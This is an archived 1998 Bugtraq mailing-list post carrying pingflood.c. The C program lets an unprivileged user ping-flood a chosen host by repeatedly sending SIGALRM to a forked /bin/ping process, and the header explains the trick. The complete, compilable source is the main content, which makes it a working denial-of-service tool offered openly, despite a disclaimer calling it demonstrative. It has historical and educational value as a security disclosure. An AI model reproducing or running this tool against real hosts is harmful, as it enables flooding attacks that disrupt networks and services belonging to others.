OSEC

Neohapsis is currently accepting applications for employment. For more information, please visit our website www.neohapsis.com or email hr@neohapsis.com
Bugtraq archives for 2nd quarter (Apr-Jun) 1998: pingflood.c

pingflood.c

AntireZ (md5330MCLINK.IT)
Thu, 9 Apr 1998 13:03:04 +0200

/*

   pingflood.c by (AntireZ) Salvatore Sanfilippo <md5330mclink.it>
   enhanced by David Welton <davidwcks.com>
   I tested it only on Linux RedHat 4.1 and 5.0.
   David Welton tested it on Debian GNU/Linux and OpenBSD reporting
it           works.


   This program is free software; you can redistribute it and/or modify
   it under the terms of the GNU General Public License as published by
   the Free Software Foundation; version 2 of the License.


-------------------------------------------------------------------------

   pingflood.c allows non-root users to 'ping flood'.

   use it as follows:

        pingflood <hostname>

   WARNING: this program is only for demonstrative use only. USE IT AT
YOUR
            OWN RISK! The authors decline all responsibility for
            damage caused by misuse of the program.

   ***   if you use this program to cause harm to others, you are very
small, petty and pathetic.    ***

   to compile: gcc -o pingflood pingflood.c


-------------------------------------------------------------------------

   TECHNICAL NOTES

   When ping runs it normally sends an ICMP ECHO_REQUEST every second.
   It accomplishes this using the alarm system call and waiting for a
SIGALRM
 signal
   from the kernel.
   Pingflood simply sends a lot of SIGALRM signals to the ping process.
It can
   do this because the ping process is owned by the user.


Salvatore Sanfilippo

*/

#include <signal.h>

#define PING "/bin/ping"

main( int argc, char *argv[] )
{
  int pid_ping;

  if (argc < 2) {
    printf("use: %s <hostname>\n", argv[0]);
    exit(0);
  }

  if(!(pid_ping = fork()))
    execl(PING, "ping", argv[1], NULL);

  if ( pid_ping <=0 ) {
    printf("pid <= 0\n");
    exit(1);
  }

  sleep (1);  /* give it a second to start going  */
  while (1)
    if ( kill(pid_ping, SIGALRM) )
      exit(1);
}